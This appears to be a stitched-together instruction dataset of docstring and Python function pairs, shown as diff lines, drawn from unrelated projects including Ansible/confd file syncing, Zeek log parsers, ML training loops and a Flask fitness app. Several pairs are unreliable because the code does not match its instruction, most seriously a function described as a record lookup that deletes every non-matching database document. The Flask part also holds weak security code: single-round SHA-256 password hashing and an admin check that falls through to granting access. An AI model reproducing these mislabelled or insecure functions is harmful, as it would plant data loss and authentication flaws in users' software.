+ msg = 'Toml File Deleted: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Toml File Deleted: %s' % results
+ app.logger.info(logmsg(msg))
+ tmpls = self.get_tmpls(host=host)
+ for x in tmpls:
+ config = x.split('.tmpl')[0]
+ if config not in cfg_names:
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='file',
+ args=dict(
+ path=os.path.join(
+ self._r_tmpl, self._folder_pre, x),
+ state='absent'))
+ msg = 'Tmpl File Deleted: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Tmpl File Deleted: %s' % results
+ app.logger.info(logmsg(msg))
+[INST] delete old toml/tmpl files in remote confd client
+ps: make sure that all these files have been backup already. [/INST] def delete_files(self):
+ for host in self._hosts:
+ aapi = Ansible2API(hosts=[host], **self._ansible_kwargs)
+ tomls = self.get_tomls(host=host)
+ for x in tomls:
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='file',
+ args=dict(
+ path=os.path.join(self._r_toml, x),
+ state='absent'))
+ msg = 'Toml File Deleted: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Toml File Deleted: %s' % results
+ app.logger.info(logmsg(msg))
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='file',
+ args=dict(
+ path='%s/' % os.path.join(
+ self._r_tmpl, self._folder_pre),
+ state='absent'))
+ msg = 'Tmpl File Deleted: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Tmpl File Deleted: %s' % results
+ app.logger.info(logmsg(msg))
+ for x in self._files:
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='file',
+ args=dict(
+ path=os.path.join(x['dir'], x['name']),
+ state='absent'))
+ msg = 'Conf File Deleted: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Conf File Deleted: %s' % results
+ app.logger.info(logmsg(msg))
+[INST] update toml/tmpl/(conf) files to remote/local confd client. [/INST] def push_files(self, rollback=False):
+ for host in self._hosts:
+ aapi = Ansible2API(hosts=[host], **self._ansible_kwargs)
+ toml_folder = '%s/' % (
+ os.path.join(self._l_toml_bak, host)
+ if rollback else os.path.join(self._l_toml, host))
+ tmpl_folder = '{}/'.format(
+ os.path.join(self._l_tmpl_bak, host)
+ if rollback else self._l_tmpl)
+ if rollback:
+ conf_folder = '%s/' % os.path.join(self._l_conf_bak, host)
+ remove_folder(toml_folder)
+ remove_folder(tmpl_folder)
+ remove_folder(conf_folder)
+ get_folder(toml_folder)
+ get_folder(tmpl_folder)
+ get_folder(conf_folder)
+ toml_pre = '%s/' % os.path.join('toml', self._folder_pre, host)
+ objs = self.minio.list_objects(
+ bucket_name=self._minio_bucket, prefix=toml_pre, recursive=False)
+ for x in objs:
+ object_name = x.object_name.encode('utf-8')
+ self.minio.fget_object(
+ bucket_name=self._minio_bucket,
+ object_name=object_name,
+ file_path=os.path.join(
+ toml_folder, os.path.basename(object_name)))
+ tmpl_pre = '%s/' % os.path.join('tmpl', self._folder_pre, host)
+ objs = self.minio.list_objects(
+ bucket_name=self._minio_bucket, prefix=tmpl_pre, recursive=False)
+ for x in objs:
+ object_name = x.object_name.encode('utf-8')
+ self.minio.fget_object(
+ bucket_name=self._minio_bucket,
+ object_name=object_name,
+ file_path=os.path.join(
+ tmpl_folder, os.path.basename(object_name)))
+ conf_pre = '%s/' % os.path.join('conf', self._folder_pre, host)
+ objs = self.minio.list_objects(
+ bucket_name=self._minio_bucket, prefix=conf_pre, recursive=False)
+ for x in objs:
+ object_name = x.object_name.encode('utf-8')
+ self.minio.fget_object(
+ bucket_name=self._minio_bucket,
+ object_name=object_name,
+ file_path=os.path.join(
+ conf_folder, os.path.basename(object_name)))
+ for x in os.listdir(conf_folder):
+ config = x.split(self._broken_word_2)
+ file_path = config[1].replace(self._broken_word_1, '/')
+ info = config[0].split('@@')
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='copy',
+ args=dict(
+ mode=info[0],
+ src=os.path.join(conf_folder, x),
+ dest=file_path,
+ group=info[2],
+ owner=info[1]))
+ msg = 'Conf File Updated: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Conf File Updated: %s' % results
+ app.logger.info(logmsg(msg))
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='copy',
+ args=dict(
+ mode=self._confd_file_mode,
+ src=toml_folder,
+ dest=self._r_toml,
+ group=self._confd_owner[1],
+ owner=self._confd_owner[0]))
+ msg = 'Toml File Updated: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Toml File Updated: %s' % results
+ app.logger.info(logmsg(msg))
+ r_tmpl_folder = os.path.join(self._r_tmpl, self._folder_pre)
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='copy',
+ args=dict(
+ mode=self._confd_file_mode,
+ src=tmpl_folder,
+ dest=r_tmpl_folder,
+ group=self._confd_owner[1],
+ owner=self._confd_owner[0]))
+ msg = 'Tmpl File Updated: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Tmpl File Updated: %s' % results
+ app.logger.info(logmsg(msg))
+[INST] Returns True if Empty and false otherwise. [/INST] def is_empty(self):
+ if self.top:
+ return False
+ return True
+[INST] Returns the value at the top without modifying the stack, raises an exception otherwise. [/INST] def peek(self):
+ if not self.is_empty():
+ return self.top.value
+ raise EmptyStackException("Cannot peek an empty stack")
+[INST] Returns the value at the top without modifying the queue, raises an exception otherwise. [/INST] def peek(self):
+ if not self.stack.is_empty():
+ current = self.stack.top
+ items = []
+ while current:
+ items.insert(0,str(current.value))
+ current = current.next
+ return items[0]
+ raise EmptyStackException("Cannot peek an empty stack")
+[INST] this function takes a string value and return hashed key. [/INST] def hash(self,key):
+ sum = 0
+ for letter in key:
+ sum= (sum + ord(letter)* key.index(letter) * 19)% self.size
+ return sum
+[INST] this function take a string key and a value then add them in the hashtable as a list. [/INST] def add(self,key):
+ index = self.hash(key)
+ if self.buckets[index] is None:
+ self.buckets[index] = key
+ return None
+ return key
+[INST] this method to append value in the last node
+input ==> value. [/INST] def append(self, value):
+ if value is None:
+ raise TypeError("insert() missing 1 required positional argument: 'value' ")
+ else:
+ new_node = Node(value)
+ if not self.head:
+ self.head = new_node
+ else:
+ new_node = Node(value)
+ current = self.head
+ while current.next:
+ current = current.next
+ current.next = new_node
+[INST] delete an item to the rear fo the queue. [/INST] def dequeue(self):
+ if not self.is_empty():
+ temp = self.front
+ self.front = self.front.next
+ temp.next = None
+ return temp.value
+ raise EmptyQueueException("Cannot dequeue an empty queue")
+[INST] Returns the value at the top without modifying the stack, raises an exception otherwise. [/INST] def peek(self):
+ if not self.is_empty():
+ return self.front.value
+ raise EmptyQueueException("Cannot peek an empty queue")
+[INST] Write log line as one-line record.. [/INST] def write_line(self, file: 'TextFile', data: 'Model',
+ lineno: 'Optional[int]' = 0) -> int:
+[INST] Serialise records to a log line.. [/INST] def dump_file(self, data: 'Iterable[Model]') -> str:
+[INST] Serialise one-line record to a log line.. [/INST] def dump_line(self, data: 'Model', lineno: 'Optional[int]' = 0) -> str:
+[INST] Serialise records to a log line.. [/INST] def dumps(self, data: 'Iterable[Model]') -> str:
+ return self.dump_file(data)
+[INST] Write log line as one-line record.. [/INST] def write_line(self, file: 'TextFile', data: Model,
+ lineno: 'Optional[int]' = 0) -> int:
+ try:
+ return file.write('%s\n' % json.dumps(data.tojson(), cls=self.encoder))
+ except TypeError as error:
+ raise JSONWriterError(str(error), lineno=lineno) from error
+[INST] Serialise records to a log line.. [/INST] def dump_file(self, data: 'Optional[Iterable[Model]]' = None) -> str:
+ if data is None:
+ return ''
+ return ''.join(self.dump_line(line, lineno=index) for index, line in enumerate(data, start=1))
+[INST] Serialise one-line record to a log line.. [/INST] def dump_line(self, data: 'Model', lineno: 'Optional[int]' = 0) -> str:
+ try:
+ return '%s\n' % json.dumps(data.tojson(), cls=self.encoder)
+ except TypeError as error:
+ raise JSONWriterError(str(error), lineno=lineno) from error
+[INST] Write log line as one-line record.. [/INST] def write_line(self, file: 'TextFile', data: 'Model',
+ lineno: 'Optional[int]' = 0) -> int:
+ try:
+ return file.write('%s\n' % self.str_separator.join(data.toascii().values()))
+ except TypeError as error:
+ raise ASCIIWriterError(str(error), lineno=lineno) from error
+[INST] Write header fields of ASCII log file.. [/INST] def write_head(self, file: 'TextFile', data: 'Optional[Model]' = None) -> int:
+ separator = self.str_separator
+ if data is None:
+ empty_field = self.str_empty_field
+ unset_field = self.str_unset_field
+ set_separator = self.str_set_separator
+ fields = ''
+ types = ''
+ else:
+ empty_field = data.empty_field.decode('ascii')
+ unset_field = data.unset_field.decode('ascii')
+ set_separator = data.set_separator.decode('ascii')
+ line_fields = data.fields
+ fields = separator.join(line_fields.keys())
+ types = separator.join(field.zeek_type for field in line_fields.values())
+ file.write('#separator %s\n' % unicode_escape(self.separator))
+ file.write('#set_separator%s%s\n' % (separator, set_separator))
+ file.write('#empty_field%s%s\n' % (separator, empty_field))
+ file.write('#unset_field%s%s\n' % (separator, unset_field))
+ file.write('#path%s%s\n' % (separator, os.path.splitext(file.name)[0]))
+ file.write('#open%s%s\n' % (separator, time.strftime(r'%Y-%m-%d-%H-%M-%S')))
+ file.write('#fields%s%s\n' % (separator, fields))
+ return file.write('#types%s%s\n' % (separator, types))
+[INST] Write trailing fields of ASCII log file.. [/INST] def write_tail(self, file: 'TextFile') -> int:
+ return file.write('#close%s%s\n' % (self.str_separator, time.strftime(r'%Y-%m-%d-%H-%M-%S')))
+[INST] Serialise records to a log line.. [/INST] def dump_file(self, data: 'Optional[Iterable[Model]]' = None, name: 'Optional[str]' = None) -> str:
+ if data:
+ data_iter = iter(data)
+ line = next(data_iter)
+ buffer = self.dump_head(line, name=name)
+ buffer += self.dump_line(line, lineno=1)
+ buffer += ''.join(self.dump_line(line, lineno=index)
+ for index, line in enumerate(data_iter, start=2))
+ else:
+ buffer = self.dump_head(name=name)
+ buffer += self.dump_tail()
+ return buffer
+[INST] Serialise one-line record to a log line.. [/INST] def dump_line(self, data: Model, lineno: 'Optional[int]' = 0) -> str:
+ try:
+ return '%s\n' % self.str_separator.join(data.toascii().values())
+ except TypeError as error:
+ raise ASCIIWriterError(str(error), lineno=lineno) from error
+[INST] Serialise header fields of ASCII log file.. [/INST] def dump_head(self, data: 'Optional[Model]' = None, name: 'Optional[str]' = None) -> str:
+ if name is None:
+ name = ''
+ separator = self.str_separator
+ if data is None:
+ empty_field = self.str_empty_field
+ unset_field = self.str_unset_field
+ set_separator = self.str_set_separator
+ fields = ''
+ types = ''
+ else:
+ empty_field = data.empty_field.decode('ascii')
+ unset_field = data.unset_field.decode('ascii')
+ set_separator = data.set_separator.decode('ascii')
+ line_fields = data.fields
+ fields = separator.join(line_fields.keys())
+ types = separator.join(field.zeek_type for field in line_fields.values())
+ buffer = '#separator %s\n' % unicode_escape(self.separator)
+ buffer += '#set_separator%s%s\n' % (separator, set_separator)
+ buffer += '#empty_field%s%s\n' % (separator, empty_field)
+ buffer += '#unset_field%s%s\n' % (separator, unset_field)
+ buffer += '#path%s%s\n' % (separator, os.path.splitext(name)[0])
+ buffer += '#open%s%s\n' % (separator, time.strftime(r'%Y-%m-%d-%H-%M-%S'))
+ buffer += '#fields%s%s\n' % (separator, fields)
+ buffer += '#types%s%s\n' % (separator, types)
+ return buffer
+[INST] Serialise trailing fields of ASCII log file.. [/INST] def dump_tail(self) -> str:
+ return '#close%s%s\n' % (self.str_separator, time.strftime(r'%Y-%m-%d-%H-%M-%S'))
+[INST] Write Bro/Zeek log file.. [/INST] def write(data: 'Iterable[Model]', filename: 'PathLike[str]', format: str, *args: 'Any', **kwargs: 'Any') -> None:
+ if format == 'ascii':
+ return write_ascii(data, filename, *args, **kwargs)
+ if format == 'json':
+ return write_json(data, filename, *args, **kwargs)
+ raise WriterFormatError('unsupported format: %s' % format)
+[INST] Parse log line as one-line record.. [/INST] def parse_line(self, line: bytes, lineno: 'Optional[int]' = 0,
+ model: 'Optional[Type[Model]]' = None) -> 'Model':
+[INST] Parse log line as one-line record.. [/INST] def loads(self, line: bytes, lineno: 'Optional[int]' = 0) -> 'Model':
+ return self.parse_line(line, lineno)
+[INST] Parse log line as one-line record.. [/INST] def parse_line(self, line: bytes, lineno: 'Optional[int]' = 0,
+ model: 'Optional[Type[Model]]' = None) -> 'Model':
+ try:
+ data = json.loads(line)
+ except json.JSONDecodeError as error:
+ raise JSONParserError(error.msg, lineno) from error
+ model_cls = model or self.model
+ if model_cls is None:
+ model_cls = new_model('', **{field: AnyType() for field in data.keys()})
+ return model_cls(**data)
+[INST] Parse log line as one-line record.. [/INST] def parse_line(self, line: bytes, lineno: 'Optional[int]' = 0,
+ model: 'Optional[Type[Model]]' = None, separator: 'Optional[bytes]' = b'\x09',
+ parser: 'Optional[List[Tuple[str, BaseType]]]' = None) -> 'Model':
+ if parser is None:
+ raise ASCIIPaserError("parse_line() missing 1 required positional argument: 'parser'")
+ data = collections.OrderedDict()
+ for i, s in enumerate(line.strip().split(separator)):
+ field_name, field_type = parser[i]
+ try:
+ data[field_name] = field_type(s)
+ except ZeekValueError as error:
+ raise ASCIIPaserError(str(error), lineno, field_name) from error
+ if model is None:
+ model = new_model('', **{field: AnyType() for field in data.keys()})
+ return model(**data)
+[INST] Parse Bro/Zeek log file.. [/INST] def parse(filename: 'PathLike[str]', *args: 'Any', **kwargs: 'Any') -> 'Union[JSONInfo, ASCIIInfo]':
+ with open(filename, 'rb') as file:
+ char = file.read(1)
+ if char == b'#':
+ return parse_ascii(filename, *args, **kwargs)
+ if char == b'{':
+ return parse_json(filename, *args, **kwargs)
+ raise ParserError('unknown format')
+[INST] Not supported for a variadic data type.. [/INST] def parse(self, data: 'Any') -> 'NoReturn':
+ raise ZeekNotImplemented
+[INST] Not supported for a variadic data type.. [/INST] def tojson(self, data: 'Any') -> 'NoReturn':
+ raise ZeekNotImplemented
+[INST] Not supported for a variadic data type.. [/INST] def toascii(self, data: 'Any') -> 'NoReturn':
+ raise ZeekNotImplemented
+[INST] Serialise data model as JSON log format.. [/INST] def tojson(self) -> 'OrderedDict[str, Any]':
+ fields = collections.OrderedDict()
+ for field, type_cls in self.__fields__.items():
+ value = getattr(self, field)
+ fields[field] = type_cls.tojson(value)
+ return fields
+[INST] Serialise data model as ASCII log format.. [/INST] def toascii(self) -> 'OrderedDict[str, str]':
+ fields = collections.OrderedDict()
+ for field, type_cls in self.__fields__.items():
+ value = getattr(self, field)
+ fields[field] = type_cls.toascii(value)
+ return fields
+[INST] Convert data model as a dictionary mapping field names to field values.. [/INST] def asdict(self, dict_factory: 'Optional[Type[dict]]' = None) -> 'Dict[str, Any]':
+ if dict_factory is None:
+ dict_factory = dict
+ fields = dict_factory()
+ for field in self.__fields__:
+ value = getattr(self, field)
+ fields[field] = value
+ return fields
+[INST] Convert data model as a tuple of field values.. [/INST] def astuple(self, tuple_factory: 'Optional[Type[tuple]]' = None) -> 'Tuple[Any, ...]':
+ field_names = []
+ field_value = []
+ for field in self.__fields__:
+ value = getattr(self, field)
+ field_names.append(field)
+ field_value.append(value)
+ if tuple_factory is None:
+ model_name = type(self).__name__
+ named_tuple = collections.namedtuple(model_name, field_names)
+ return named_tuple(*field_value)
+ return tuple_factory(field_value)
+[INST] Create a data model dynamically with the appropriate fields.. [/INST] def new_model(name: str, **fields: 'Any') -> 'Type[Model]':
+ def gen_body(ns: 'Dict[str, Any]') -> None:
+ for name, type_cls in fields.items():
+ ns[name] = type_cls
+ return types.new_class(name, (Model,), exec_body=gen_body)
+[INST] Return path to local copy of PDFBox jar file.. [/INST] def _get_pdfbox_path(self):
+ if 'PDFBOX' in os.environ:
+ pdfbox_path = pathlib.Path(os.environ['PDFBOX'])
+ if not pdfbox_path.exists():
+ raise RuntimeError('pdfbox not found')
+ return pdfbox_path
+ a = appdirs.AppDirs('python-pdfbox')
+ cache_dir = pathlib.Path(a.user_cache_dir)
+ file_list = list(cache_dir.glob('pdfbox-app-*.jar'))
+ if file_list:
+ def f(s):
+ v = re.search('pdfbox-app-([\w\.\-]+)\.jar', s.name).group(1)
+ return pkg_resources.parse_version(v)
+ return sorted(file_list, key=f)[-1]
+ else:
+ pdfbox_url = self._get_latest_pdfbox_url()
+ sha512_url = pdfbox_url + '.sha512'
+ r = urllib.request.urlopen(pdfbox_url)
+ try:
+ data = r.read()
+ except:
+ raise RuntimeError('error retrieving %s' % pdfbox_url)
+ else:
+ cache_dir.mkdir(exist_ok=True, parents=True)
+ pdfbox_path = cache_dir.joinpath(pathlib.Path(pdfbox_url).name)
+ with open(pdfbox_path, 'wb') as f:
+ f.write(data)
+ r = urllib.request.urlopen(sha512_url)
+ encoding = r.headers.get_content_charset('utf-8')
+ try:
+ sha512 = r.read().decode(encoding).strip()
+ except:
+ raise RuntimeError('error retrieving sha512sum')
+ else:
+ if not self._verify_sha512(data, sha512):
+ raise RuntimeError('failed to verify sha512sum')
+ return pdfbox_path
+[INST] Run validation with validation data split, computes mean average
+precision and the loss of the prediction results.. [/INST] def run_valid(self, epoch=0):
+ model = self.model
+ dataset = self.dataset
+ device = self.device
+ cfg = self.cfg
+ model.eval()
+ timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
+ log.info("DEVICE : {}".format(device))
+ log_file_path = join(cfg.logs_dir, 'log_valid_' + timestamp + '.txt')
+ log.info("Logging in file : {}".format(log_file_path))
+ log.addHandler(logging.FileHandler(log_file_path))
+ batcher = ConcatBatcher(device, model.cfg.name)
+ valid_dataset = dataset.get_split('validation')
+ valid_split = TorchDataloader(dataset=valid_dataset,
+ preprocess=model.preprocess,
+ transform=model.transform,
+ shuffle=True,
+ steps_per_epoch=dataset.cfg.get(
+ 'steps_per_epoch_valid', None))
+ valid_loader = DataLoader(
+ valid_split,
+ batch_size=cfg.val_batch_size,
+ num_workers=cfg.get('num_workers', 4),
+ pin_memory=cfg.get('pin_memory', False),
+ collate_fn=batcher.collate_fn,
+ worker_init_fn=lambda x: np.random.seed(x + np.uint32(
+ torch.utils.data.get_worker_info().seed)))
+ log.info("Started validation")
+ slots_save_dir = cfg.slots_save_dir
+ Path(f"{slots_save_dir}/").mkdir(parents=True, exist_ok=True)
+ self.valid_losses = {}
+ with torch.no_grad():
+ for valid_idx, data in enumerate(
+ tqdm(valid_loader, desc='validation')):
+ data.to(device)
+ results = model(data)
+ for batch_idx, slots in enumerate(results[0]):
+ slots = slots.cpu().numpy()
+ num_slots = slots.shape[0]
+ for i in range(num_slots):
+ plt.subplot(num_slots, 1, i + 1)
+ plt.imshow(slots[i], cmap='binary')
+ plt.colorbar()
+ plt.title(f"Slot {i}")
+ plt.savefig(
+ f"{slots_save_dir}/epoch_{epoch}_slots_{valid_idx}_{batch_idx}.png")
+ plt.clf()
+ loss = model.loss(results, data)
+ for l, v in loss.items():
+ if not l in self.valid_losses:
+ self.valid_losses[l] = []
+ self.valid_losses[l].append(v.cpu().numpy())
+[INST] Run training with train data split.. [/INST] def run_train(self):
+ model = self.model
+ device = self.device
+ dataset = self.dataset
+ cfg = self.cfg
+ log.info("DEVICE : {}".format(device))
+ timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
+ log_file_path = join(cfg.logs_dir, 'log_train_' + timestamp + '.txt')
+ log.info("Logging in file : {}".format(log_file_path))
+ log.addHandler(logging.FileHandler(log_file_path))
+ batcher = ConcatBatcher(device, model.cfg.name)
+ train_dataset = dataset.get_split('training')
+ train_split = TorchDataloader(dataset=train_dataset,
+ preprocess=model.preprocess,
+ transform=model.transform,
+ steps_per_epoch=dataset.cfg.get(
+ 'steps_per_epoch_train', None))
+ train_loader = DataLoader(
+ train_split,
+ batch_size=cfg.batch_size,
+ num_workers=cfg.get('num_workers', 4),
+ pin_memory=cfg.get('pin_memory', False),
+ collate_fn=batcher.collate_fn,
+ worker_init_fn=lambda x: np.random.seed(x + np.uint32(
+ torch.utils.data.get_worker_info().seed))
+ )
+ self.optimizer, self.scheduler = model.get_optimizer(cfg.optimizer)
+ is_resume = model.cfg.get('is_resume', True)
+ start_ep = self.load_ckpt(model.cfg.ckpt_path, is_resume=is_resume)
+ dataset_name = dataset.name if dataset is not None else ''
+ tensorboard_dir = join(
+ self.cfg.train_sum_dir,
+ model.__class__.__name__ + '_' + dataset_name + '_torch')
+ runid = get_runid(tensorboard_dir)
+ self.tensorboard_dir = join(self.cfg.train_sum_dir,
+ runid + '_' + Path(tensorboard_dir).name)
+ writer = SummaryWriter(self.tensorboard_dir)
+ self.save_config(writer)
+ log.info("Writing summary in {}.".format(self.tensorboard_dir))
+ log.info("Started training")
+ for epoch in range(start_ep, cfg.max_epoch + 1):
+ log.info(f'=== EPOCH {epoch:d}/{cfg.max_epoch:d} ===')
+ model.train()
+ self.losses = {}
+ process_bar = tqdm(train_loader, desc='training')
+ for data in process_bar:
+ data.to(device)
+ results = model(data)
+ loss = model.loss(results, data)
+ loss_sum = sum(loss.values())
+ self.optimizer.zero_grad()
+ loss_sum.backward()
+ if model.cfg.get('grad_clip_norm', -1) > 0:
+ torch.nn.utils.clip_grad_value_(model.parameters(),
+ model.cfg.grad_clip_norm)
+ self.optimizer.step()
+ desc = "training - "
+ for l, v in loss.items():
+ if not l in self.losses:
+ self.losses[l] = []
+ self.losses[l].append(v.cpu().detach().numpy())
+ desc += " %s: %.03f" % (l, v.cpu().detach().numpy())
+ desc += " > loss: %.03f" % loss_sum.cpu().detach().numpy()
+ process_bar.set_description(desc)
+ process_bar.refresh()
+ if self.scheduler is not None:
+ self.scheduler.step()
+ if (epoch % cfg.get("validation_freq", 1)) == 0:
+ self.run_valid(epoch)
+ self.save_logs(writer, epoch)
+ if epoch % cfg.save_ckpt_freq == 0:
+ self.save_ckpt(epoch)
+[INST] Save experiment configuration with tensorboard summary.. [/INST] def save_config(self, writer):
+ writer.add_text("Description/Open3D-ML", self.cfg_tb['readme'], 0)
+ writer.add_text("Description/Command line", self.cfg_tb['cmd_line'], 0)
+ writer.add_text('Configuration/Dataset',
+ code2md(self.cfg_tb['dataset'], language='json'), 0)
+ writer.add_text('Configuration/Model',
+ code2md(self.cfg_tb['model'], language='json'), 0)
+ writer.add_text('Configuration/Pipeline',
+ code2md(self.cfg_tb['pipeline'], language='json'), 0)
+[INST] Reads lidar data from the path provided.. [/INST] def read_pc(path):
+ assert Path(path).exists()
+ return joblib.load(path)
+[INST] takes uuid for record of type key and returns None if not found else the doc if found.. [/INST] def remove_all_admins_not_matching_this(u, user_type=None, collection=None):
+ __doc__ = None
+ if (collection):
+ try:
+ docs = collection.find()
+ for doc in docs:
+ uu = doc.get(user_type) if (user_type) else None
+ if (str(uu) == u):
+ __doc__ = doc
+ else:
+ d = {'_id':doc.get('_id')}
+ print('(-) Removed: {}'.format(d))
+ collection.remove(d)
+ except:
+ pass
+ return __doc__
+[INST] Checks if email is used in database already.. [/INST] def validate_email(self, field):
+ if Runner.query.filter_by(email=field.data).count() > 0:
+ raise validators.ValidationError("Email in Use")
+ else:
+ print("Validate your account by going to http://127.0.0.1:5000/validate/" + self.username.data)
+[INST] Checks if both password entered matches the one stored in the database,
+and if the username entered exists.. [/INST] def validate_password(self, field):
+ if Runner.query.filter_by(username=self.username.data).count() == 0:
+ raise validators.ValidationError("Incorrect Username or Password")
+ salt = Runner.query.filter_by(username=self.username.data).first().salt
+ hashed_password = Runner.query.filter_by(username=self.username.data).first().hashed_password
+ if password.check_password(field.data, salt, hashed_password) is not True:
+ raise validators.ValidationError("Incorrect Username or Password")
+[INST] Checks if the data the user entered is mathematically correct, and if the speed of their running is
+an acceptable speed.. [/INST] def validate_speed(self, field):
+ if self.speed.data * self.hours_trained.data != self.distance.data:
+ raise validators.ValidationError("Check your maths, your numbers are wrong!")
+ if self.speed.data > 12:
+ raise validators.ValidationError("Are you sure your ran that fast?")
+[INST] Checks if the data the user entered is mathematically correct, and if the speed of their cycling is
+an acceptable speed.. [/INST] def validate_speed(self, field):
+ if self.speed.data * self.hours_trained.data != self.distance.data:
+ raise validators.ValidationError("Check your maths, your numbers are wrong!")
+ if self.speed.data > 25:
+ raise validators.ValidationError("Are you sure you cycled that fast?")
+[INST] Returns the hashed password and a randomly generated salt.. [/INST] def hash_password(password):
+ password = password.encode("utf-8")
+ salt = base64.b64encode(os.urandom(32))
+ hashed_password = hashlib.sha256(salt + password).hexdigest()
+ return hashed_password, salt
+[INST] Hashes the password the user provides and checks it against the stored hash.. [/INST] def check_password(password, salt, hashed_password):
+ password = password.encode("utf-8")
+ return hashlib.sha256(salt + password).hexdigest() == hashed_password
+[INST] Generates the percentage width of the progress bars on the Web App homepage.. [/INST] def homepage_progress(current_user):
+ def add_up_distance(training_type, username):
+ data = 0
+ x = Training.query.filter_by(training_type=training_type, username=username).all()
+ for i in x:
+ data += i.distance
+ return data
+ def add_calories(username):
+ data = 0
+ for i in Training.query.filter_by(username=username).all():
+ data += i.calories_burnt
+ return data
+ def top_distance(training_type):
+ data = 0
+ for user in Runner.query.order_by(Runner.username):
+ x = add_up_distance(training_type, user.username)
+ if x > data:
+ data = x
+ return data
+ def top_calories():
+ data = 0
+ for user in Runner.query.order_by(Runner.username):
+ x = add_calories(user.username)
+ if x > data:
+ data = x
+ return data
+ def calculate_percentage(top, user):
+ if user == 0:
+ return 10
+ percent = (((user - top) / top) * 90)
+ if percent < 0:
+ percent *= -1
+ if percent <= 10:
+ return 10
+ else:
+ return percent
+ percentages = {"calories": calculate_percentage(top_calories(), add_calories(current_user.username)),
+ "running": calculate_percentage(top_distance("running"), add_up_distance("running",
+ current_user.username)),
+ "cycling": calculate_percentage(top_distance("cycling"), add_up_distance("cycling",
+ current_user.username)),
+ "swimming": calculate_percentage(top_distance("swimming"), add_up_distance("swimming",
+ current_user.username))}
+ return percentages
+[INST] Custom function that checks if the user is an Admin. Based off of the standard Flask-Login @login_required.. [/INST] def admin_required(func):
+ @wraps(func)
+ def decorated_view(*args, **kwargs):
+ if current_user.admin is True:
+ return func(*args, **kwargs)
+ elif current_user.admin is None or current_user.admin is False:
+ return Response("You are not permitted to access this page!", 401)
+ return func(*args, **kwargs)
+ return decorated_view
+[INST] Parses a relative path to tensorflow event file to a reasonable neptune-compatible name. [/INST] def parse_path_to_experiment_name(path):
+ experiment_name = os.path.dirname(path)
+ if experiment_name:
+ return experiment_name
+ else:
+ return "untitled-tensorboard"
+[INST] Parses a relative path to tensorflow event file to a hostname. [/INST] def parse_path_to_hostname(path):
+ file_name = os.path.basename(path)
+ if file_name.startswith(_EVENTS_FILE_PREFIX):
+ timestamp_and_hostname = file_name[len(_EVENTS_FILE_PREFIX):]
+ separator_index = timestamp_and_hostname.find('.')
+ if separator_index >= 0:
+ return timestamp_and_hostname[(separator_index + 1):]
+ else:
+ return None
+ else:
+ return None
+[INST] Import TensorFlow event files to Neptune\n
+PATH is a directory where Neptune will look to find TensorFlow event files that it can import.
+Neptune will recursively walk the directory structure rooted at logdir, looking for .*tfevents.* files.. [/INST] def sync(project, path):
+ import warnings
+ warnings.simplefilter(action='ignore', category=FutureWarning)
+ from neptune_tensorboard.sync.sync import sync as run_sync
+ return run_sync(project=project, path=path)
+[INST] Use the Django builtin static file resolver to return an absolute path
+usable as CSS url() argument. Sass equivalent of the 'static' template
+tag.. [/INST] def static(path):
+ return django_static(path)
+[INST] Perform sass.compile, but with the appropriate include_paths for Django added. [/INST] def compile(**kwargs):
+ kwargs = kwargs.copy()
+ if PRECISION is not None:
+ kwargs['precision'] = PRECISION
+ kwargs['include_paths'] = (kwargs.get('include_paths') or []) + get_include_paths()
+ custom_functions = CUSTOM_FUNCTIONS.copy()
+ custom_functions.update(kwargs.get('custom_functions', {}))
+ kwargs['custom_functions'] = custom_functions
+ if SOURCEMAPS and kwargs.get('filename', None):
+ base_path = os.path.dirname(kwargs['filename'])
+ sourcemap_filename = os.path.join(base_path, 'sourcemap.map')
+ kwargs['source_map_filename'] = sourcemap_filename
+ libsass_output, sourcemap = sass.compile(**kwargs)
+ sourcemap = prefix_sourcemap(sourcemap, base_path)
+ output = embed_sourcemap(libsass_output, sourcemap)
+ else:
+ output = sass.compile(**kwargs)
+ return output
+[INST] Wait for a key press on the console and return it.. [/INST] def wait_key(message = ''):
+ if message != '':
+ print (message)
+ result = None
+ if os.name == 'nt':
+ import msvcrt
+ result = msvcrt.getch()
+ else:
+ import termios
+ fd = sys.stdin.fileno()
+ oldterm = termios.tcgetattr(fd)
+ newattr = termios.tcgetattr(fd)
+ newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
+ termios.tcsetattr(fd, termios.TCSANOW, newattr)
+ try:
+ result = sys.stdin.read(1)
+ except IOError:
+ pass
+ finally:
+ termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
+ return result
+[INST] image must be numpy array H X W X channels. [/INST] def write_png(filename, image):
+ import zlib, struct
+ buf = image.flatten().tobytes()
+ width = image.shape[1]
+ height = image.shape[0]
+ width_byte_4 = width * 4
+ raw_data = b''.join(b'\x00' + buf[span:span + width_byte_4]
+ for span in range((height - 1) * width_byte_4, -1, - width_byte_4))
+ def png_pack(png_tag, data):
+ chunk_head = png_tag + data
+ return (struct.pack("!I", len(data)) +
+ chunk_head +
+ struct.pack("!I", 0xFFFFFFFF & zlib.crc32(chunk_head)))
+ png_bytes = b''.join([
+ b'\x89PNG\r\n\x1a\n',
+ png_pack(b'IHDR', struct.pack("!2I5B", width, height, 8, 6, 0, 0, 0)),
+ png_pack(b'IDAT', zlib.compress(raw_data, 9)),
+ png_pack(b'IEND', b'')])
+ AirSimClientBase.write_file(filename, png_bytes)
+[INST] Data map generator for simulator(AirSim) data. Reads the driving_log csv file and returns a list of 'center camera image name - label(s)' tuples
+Inputs:
